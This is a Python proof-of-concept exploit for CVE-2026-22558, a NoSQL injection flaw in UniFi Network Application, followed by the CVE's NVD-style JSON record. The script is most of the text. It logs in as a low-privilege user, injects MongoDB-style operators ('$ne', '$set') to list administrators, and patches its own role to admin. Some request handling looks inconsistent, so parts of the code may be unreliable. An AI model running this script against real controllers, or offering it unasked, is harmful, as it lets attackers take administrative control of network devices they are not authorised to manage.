CVE-2026-22558

# CVE-2026-22558 PoC - UniFi NoSQL Injection Privilege Escalation # Requires valid low-privilege credentials import requests import json TARGET_URL = "https://target-unifi.local" USERNAME = "low_priv_user" PASSWORD = "password123" def get_auth_token(): """Authenticate and get session token""" login_url = f"{TARGET_URL}/api/login" payload = { "username": USERNAME, "password": PASSWORD } response = requests.post(login_url, json=payload, verify=False) return response.cookies.get('unifises'), response.json().get('token') def exploit_nosql_injection(token, cookies): """Exploit NoSQL injection to escalate privileges""" # Inject NoSQL operators to bypass authorization exploit_url = f"{TARGET_URL}/api/s/default/admins" headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } # NoSQL injection payload - bypass permission check payload = { "filter": { "name": { "$ne": "" } }, "fields": {"role": 1, "permissions": 1, "name": 1} } response = requests.get(exploit_url, headers=headers, cookies=cookies, json=payload) return response.json() def privilege_escalation(token, cookies): """Elevate to admin by modifying own role""" exploit_url = f"{TARGET_URL}/api/s/default/admins/self" headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } # Inject NoSQL operator to set admin role payload = { "$set": { "role": "admin", "permissions": {"$gt": 0} } } response = requests.patch(exploit_url, headers=headers, cookies=cookies, json=payload) return response.status_code == 200 if __name__ == "__main__": token, cookies = get_auth_token() if token: print("[+] Authentication successful") admins_data = exploit_nosql_injection(token, cookies) print(f"[+] Retrieved admin data: {json.dumps(admins_data, indent=2)}") if privilege_escalation(token, cookies): print("[+] Privilege escalation successful - Now admin!")

{"cve": {"id": "CVE-2026-22558", "sourceIdentifier": "[email protected]", "published": "2026-03-19T15:16:23.697", "lastModified": "2026-04-30T16:14:36.180", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Authenticated NoSQL Injection vulnerability found in UniFi Network Application could allow a malicious actor with authenticated access to the network to escalate privileges."}, {"lang": "es", "value": "Una vulnerabilidad de inyección NoSQL autenticada encontrada en la aplicación UniFi Network podría permitir a un actor malicioso con acceso autenticado a la red escalar privilegios."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-943"}]}], "references": [{"url": "https://community.ui.com/releases/Security-Advisory-Bulletin-062-062/c29719c0-405e-4d4a-8f26-e343e99f931b", "source": "[email protected]"}]}}